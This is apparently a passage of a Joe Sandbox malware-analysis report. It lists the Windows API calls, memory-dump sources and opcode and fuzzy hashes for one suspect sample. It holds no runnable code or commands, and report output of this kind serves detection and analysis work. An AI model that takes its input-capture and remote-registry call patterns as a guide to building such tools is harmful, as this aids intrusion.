                                                • Instruction Fuzzy Hash: 5D217179600205EBDF209F29DC05AAA7BF4BF54720F20862AFCA0D73D0DB749851CB50
                                                APIs
                                                • GetStdHandle.KERNEL32(000000F6), ref: 007D6F32
                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 007D6F64
                                                • GetStdHandle.KERNEL32(000000F6), ref: 007D6F75
                                                • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 007D6FAF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: CreateHandle$FilePipe
                                                • String ID: nul
                                                • API String ID: 4209266947-2873401336
                                                • Opcode ID: 7d7e5b18ac29a4d2ccb6349e30da1629fb68111dd58c5e2706da07d92c4bec06
                                                • Instruction ID: 9cc579153940d39ac887948dad90c974179b1dcaf3ffdb62028e25dfb1d84320
                                                • Opcode Fuzzy Hash: 7d7e5b18ac29a4d2ccb6349e30da1629fb68111dd58c5e2706da07d92c4bec06
                                                • Instruction Fuzzy Hash: 5F219071600605ABDB209F68AC44AA977B8AF45720F204A5AFCA0E73D0DB78A850CB60
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 007DACDE
                                                • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 007DAD32
                                                • __swprintf.LIBCMT ref: 007DAD4B
                                                • SetErrorMode.KERNEL32(00000000,00000001,00000000,007FF910), ref: 007DAD89
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: ErrorMode$InformationVolume__swprintf
                                                • String ID: %lu
                                                • API String ID: 3164766367-685833217
                                                • Opcode ID: 564ed9015b17c12d9dc64f5f918558b5ad3de33be0d7f16e52a3ee0465cf590e
                                                • Instruction ID: ef8c75fb222468c6195214dcbbc8a5f7ac9a412379dd115a8a553a26fe7903eb
                                                • Opcode Fuzzy Hash: 564ed9015b17c12d9dc64f5f918558b5ad3de33be0d7f16e52a3ee0465cf590e
                                                • Instruction Fuzzy Hash: 61214474A00109EFCB10DF64D985DAE77B8FF89714B008069F509EB351DB75EA41CB61
                                                APIs
                                                  • Part of subcall function 00777D2C: _memmove.LIBCMT ref: 00777D66
                                                  • Part of subcall function 007CA15C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 007CA179
                                                  • Part of subcall function 007CA15C: GetWindowThreadProcessId.USER32(?,00000000), ref: 007CA18C
                                                  • Part of subcall function 007CA15C: GetCurrentThreadId.KERNEL32 ref: 007CA193
                                                  • Part of subcall function 007CA15C: AttachThreadInput.USER32(00000000), ref: 007CA19A
                                                • GetFocus.USER32 ref: 007CA334
                                                  • Part of subcall function 007CA1A5: GetParent.USER32(?), ref: 007CA1B3
                                                • GetClassNameW.USER32(?,?,00000100), ref: 007CA37D
                                                • EnumChildWindows.USER32(?,007CA3F5), ref: 007CA3A5
                                                • __swprintf.LIBCMT ref: 007CA3BF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                • String ID: %s%d
                                                • API String ID: 1941087503-1110647743
                                                • Opcode ID: 0e61e9f28ac6e44ec5428760398b4cabb067a90306aa6b5a49fa7eea78e1c654
                                                • Instruction ID: b233b9b970bb52d22e158c5023666a8dd63cc9dd2faa5a0e416bac5821e18191
                                                • Opcode Fuzzy Hash: 0e61e9f28ac6e44ec5428760398b4cabb067a90306aa6b5a49fa7eea78e1c654
                                                • Instruction Fuzzy Hash: 31118C7120020DBBDF11BF64DC8AFAA7778AF44715F04807DF908AA242CA785945CB75
                                                APIs
                                                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 007EED1B
                                                • GetProcessIoCounters.KERNEL32(00000000,?), ref: 007EED4B
                                                • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 007EEE7E
                                                • CloseHandle.KERNEL32(?), ref: 007EEEFF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                • String ID:
                                                • API String ID: 2364364464-0
                                                • Opcode ID: 0a19a258a91b61716f41bb03a2946d36a4fea5d52fffd3c2a1b93ffba0abed51
                                                • Instruction ID: 606248a311e62c08c435916a72f718fe08e9dcbb4f0e1a3dc5859b9ffc21364f
                                                • Opcode Fuzzy Hash: 0a19a258a91b61716f41bb03a2946d36a4fea5d52fffd3c2a1b93ffba0abed51
                                                • Instruction Fuzzy Hash: 4A8153716013009FDB20DF25C88AF6AB7E5AF88750F14C81DF699DB292DBB4AC40CB56
                                                APIs
                                                  • Part of subcall function 00777F41: _memmove.LIBCMT ref: 00777F82
                                                  • Part of subcall function 007F0EA5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007EFE38,?,?), ref: 007F0EBC
                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007F0188
                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007F01C7
                                                • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 007F020E
                                                • RegCloseKey.ADVAPI32(?,?), ref: 007F023A
                                                • RegCloseKey.ADVAPI32(00000000), ref: 007F0247
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                • String ID:
                                                • API String ID: 3440857362-0
                                                • Opcode ID: 949c9eb3cb000da92afc65d8bad6a9a7676471a5211075a8991990cff85a0023
                                                • Instruction ID: 38f5a3226b4dad65f9771009721eb9f970cab3abbba8676adec1eecbacd5a346
                                                • Opcode Fuzzy Hash: 949c9eb3cb000da92afc65d8bad6a9a7676471a5211075a8991990cff85a0023
                                                • Instruction Fuzzy Hash: CB512C71108208EFD704EB54D885E7EB7E8FF84754F04892DF69587292DB38E905CB52
                                                APIs
                                                  • Part of subcall function 00779997: __itow.LIBCMT ref: 007799C2
                                                  • Part of subcall function 00779997: __swprintf.LIBCMT ref: 00779A0C
                                                • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 007EDA3B
                                                • GetProcAddress.KERNEL32(00000000,?), ref: 007EDABE
                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 007EDADA
                                                • GetProcAddress.KERNEL32(00000000,?), ref: 007EDB1B
                                                • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 007EDB35
                                                  • Part of subcall function 00775B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,007D793F,?,?,00000000), ref: 00775B8C
                                                  • Part of subcall function 00775B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,007D793F,?,?,00000000,?,?), ref: 00775BB0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                • String ID:
                                                • API String ID: 327935632-0
                                                • Opcode ID: 0d8dc90caa1f3ac847e2ee0c98e3a65540c3858163e95719cf088246e4282eca
                                                • Instruction ID: 54e12cb0389e0b7a83862e735628fa7162c92c80143ac58d8a5465141479ec61
                                                • Opcode Fuzzy Hash: 0d8dc90caa1f3ac847e2ee0c98e3a65540c3858163e95719cf088246e4282eca
                                                • Instruction Fuzzy Hash: C9513775A01249DFDB11EFA8C4889ADB7F4EF48320B05C069E919AB311DB38AE45CF91
                                                APIs
                                                • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 007DE6AB
                                                • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 007DE6D4
                                                • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 007DE713
                                                  • Part of subcall function 00779997: __itow.LIBCMT ref: 007799C2
                                                  • Part of subcall function 00779997: __swprintf.LIBCMT ref: 00779A0C
                                                • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 007DE738
                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 007DE740
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                • String ID:
                                                • API String ID: 1389676194-0
                                                • Opcode ID: 1d7c2f7f9fa0ef16aa9d6cf99b3341f993702a1026748fba458196d5a54ac58a
                                                • Instruction ID: d354aa6aefba3068eb986a0f130609cee99a7a43e05aa4a0e2a1264e1f013c1e
                                                • Opcode Fuzzy Hash: 1d7c2f7f9fa0ef16aa9d6cf99b3341f993702a1026748fba458196d5a54ac58a
                                                • Instruction Fuzzy Hash: 67510535A00205DFDF11EF64C985AAEBBF5EF48314B1480A9E949AB362CB39ED11DB50
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b43ffa6f72a8fee60d60dcf91b5471d00c806e36c015a9fab8e0b440daa031af
                                                • Instruction ID: 3c8cd06f8611ddb779edf3b7ce918adc338667993b3b301ed366bf139e8a775b
                                                • Opcode Fuzzy Hash: b43ffa6f72a8fee60d60dcf91b5471d00c806e36c015a9fab8e0b440daa031af
                                                • Instruction Fuzzy Hash: C341B3B590024CBBD710DF68CC45FB9BBB8FB09360F164265EA19A73E1CB38AD41DA51
                                                APIs
                                                • GetCursorPos.USER32(?), ref: 00772357
                                                • ScreenToClient.USER32(008357B0,?), ref: 00772374
                                                • GetAsyncKeyState.USER32(00000001), ref: 00772399
                                                • GetAsyncKeyState.USER32(00000002), ref: 007723A7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: AsyncState$ClientCursorScreen
                                                • String ID:
                                                • API String ID: 4210589936-0
                                                • Opcode ID: 175b71dd5fdc58a5e97513b04f295d2c338bde2ac7324788bda8a4c012d9590a
                                                • Instruction ID: 947e83b8d94106cb221cc178da10edc945d23eeaccd4e86be69563c92cb9787d
                                                • Opcode Fuzzy Hash: 175b71dd5fdc58a5e97513b04f295d2c338bde2ac7324788bda8a4c012d9590a
                                                • Instruction Fuzzy Hash: BA41A575A04109FBCF159F68C844AEDBB75FB46360F20832AF83896291CB386951DF91
                                                APIs
                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007C673D
                                                • TranslateAcceleratorW.USER32(?,?,?), ref: 007C6789
                                                • TranslateMessage.USER32(?), ref: 007C67B2
                                                • DispatchMessageW.USER32(?), ref: 007C67BC
                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007C67CB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                • String ID:
                                                • API String ID: 2108273632-0
                                                • Opcode ID: 44ae46c5ac3661c942331c8fe74e391e802347d743389bd22f3b87729141ffe2
                                                • Instruction ID: 164d6402a10d672f280cba39428c2647086ee9372da95c0b1a94a651f794542e
                                                • Opcode Fuzzy Hash: 44ae46c5ac3661c942331c8fe74e391e802347d743389bd22f3b87729141ffe2
                                                • Instruction Fuzzy Hash: 2331A271904606AFDB208FB4CC88FB67BE8AF01308F14496DE425C61A1EB2D9489DBA0
                                                APIs
                                                • GetWindowRect.USER32(?,?), ref: 007C8CF2
                                                • PostMessageW.USER32(?,00000201,00000001), ref: 007C8D9C
                                                • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 007C8DA4
                                                • PostMessageW.USER32(?,00000202,00000000), ref: 007C8DB2
                                                • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 007C8DBA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: MessagePostSleep$RectWindow
                                                • String ID:
                                                • API String ID: 3382505437-0
                                                • Opcode ID: 92045dec73d19b3be4910d9d0029efdcd38c0f700ed88bdf3c6cd031fa237f18
                                                • Instruction ID: c76a1f0361b55ddeea83487e498abb605a4ef6835ed78a94e23e63e963c9567e
                                                • Opcode Fuzzy Hash: 92045dec73d19b3be4910d9d0029efdcd38c0f700ed88bdf3c6cd031fa237f18
                                                • Instruction Fuzzy Hash: EC31BF71600219EBDB14CF68D94CBAE3BB5EF18315F10826DF926E62D0CBB89914DB91
                                                APIs
                                                • IsWindowVisible.USER32(?), ref: 007CB4C6
                                                • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 007CB4E3
                                                • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 007CB51B
                                                • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 007CB541
                                                • _wcsstr.LIBCMT ref: 007CB54B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                • String ID:
                                                • API String ID: 3902887630-0
                                                • Opcode ID: 9e04e5656f257cab36b9d3451b2f8715771434c48392bbcb9ba967eb9c524599
                                                • Instruction ID: 3bad7d40c047699eeeab281274827ab4f8b7c478e8fbdd22ae85053279b689fa
                                                • Opcode Fuzzy Hash: 9e04e5656f257cab36b9d3451b2f8715771434c48392bbcb9ba967eb9c524599
                                                • Instruction Fuzzy Hash: 2221D772604240BEEB259B39AC0AF7B7BADDF49760F10802DF805DA161EF69DD50D6A0
                                                APIs
                                                  • Part of subcall function 00772612: GetWindowLongW.USER32(?,000000EB), ref: 00772623
                                                • GetWindowLongW.USER32(?,000000F0), ref: 007FB1C6
                                                • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 007FB1EB
                                                • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 007FB203
                                                • GetSystemMetrics.USER32(00000004), ref: 007FB22C
                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,007E0FA5,00000000), ref: 007FB24A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Window$Long$MetricsSystem
                                                • String ID:
                                                • API String ID: 2294984445-0
                                                • Opcode ID: a3b7177112e04f475047aec70baea9db24eb2782c35dd2fd1db168c9b32e4ccd
                                                • Instruction ID: 9e560e83fa5813837b87e65371adc01ca762b976f55deaf2b3a952ce5b47161d
                                                • Opcode Fuzzy Hash: a3b7177112e04f475047aec70baea9db24eb2782c35dd2fd1db168c9b32e4ccd
                                                • Instruction Fuzzy Hash: 8E216071614619AFCB109F38CC48A7A37A4FB45721F144B35FA36D72E0EB349914DB90
                                                APIs
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 007C95E2
                                                  • Part of subcall function 00777D2C: _memmove.LIBCMT ref: 00777D66
                                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 007C9614
                                                • __itow.LIBCMT ref: 007C962C
                                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 007C9654
                                                • __itow.LIBCMT ref: 007C9665
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: MessageSend$__itow$_memmove
                                                • String ID:
                                                • API String ID: 2983881199-0
                                                • Opcode ID: eda0d075e0a578aa720f6f13a565ad2a07c1daad6548e9b3916764e1ddbf5ba8
                                                • Instruction ID: 8b4feb4239ff2c83cb2ab86396b48666950b2ccc1bf5e21ab615720ec8159799
                                                • Opcode Fuzzy Hash: eda0d075e0a578aa720f6f13a565ad2a07c1daad6548e9b3916764e1ddbf5ba8
                                                • Instruction Fuzzy Hash: BF21B331700218EBDF20AA649C8DFAE7BA8EF59710F04406DFA04E7291DA788D41D795
                                                APIs
                                                • IsWindow.USER32(00000000), ref: 007E5B84
                                                • GetForegroundWindow.USER32 ref: 007E5B9B
                                                • GetDC.USER32(00000000), ref: 007E5BD7
                                                • GetPixel.GDI32(00000000,?,00000003), ref: 007E5BE3
                                                • ReleaseDC.USER32(00000000,00000003), ref: 007E5C1E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Window$ForegroundPixelRelease
                                                • String ID:
                                                • API String ID: 4156661090-0
                                                • Opcode ID: 2590bc6cfbbfc9f0f4b0995c2c1b3031e013b7bc8ab0947f3414eebf43bb521c
                                                • Instruction ID: da5db9e29610f1d690bc9d0542fd964e214fdde65e1a1202ecdfb210f4a66076
                                                • Opcode Fuzzy Hash: 2590bc6cfbbfc9f0f4b0995c2c1b3031e013b7bc8ab0947f3414eebf43bb521c
                                                • Instruction Fuzzy Hash: B1214C75A01504EFDB14EF69CC88AAAB7E5EF48310B14C479E94AD7262DA38AD00CB54
                                                APIs
                                                • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0077134D
                                                • SelectObject.GDI32(?,00000000), ref: 0077135C
                                                • BeginPath.GDI32(?), ref: 00771373
                                                • SelectObject.GDI32(?,00000000), ref: 0077139C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: ObjectSelect$BeginCreatePath
                                                • String ID:
                                                • API String ID: 3225163088-0
                                                • Opcode ID: 1abd524a8581d6f9fb4aa6c96d067dfc3b7cd54333a737e1398657aa624fbd24
                                                • Instruction ID: 2569f51965d8364673f0c6300616e068ba931b2cb8c22ad07fdfbf4c37cfa608
                                                • Opcode Fuzzy Hash: 1abd524a8581d6f9fb4aa6c96d067dfc3b7cd54333a737e1398657aa624fbd24
                                                • Instruction Fuzzy Hash: D5218030800608EFDF109F29DC04B6A7BE8FB807A1F54CA36F818965B1DB799891DF94
                                                APIs
                                                • GetCurrentThreadId.KERNEL32 ref: 007D4B61
                                                • __beginthreadex.LIBCMT ref: 007D4B7F
                                                • MessageBoxW.USER32(?,?,?,?), ref: 007D4B94
                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 007D4BAA
                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 007D4BB1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
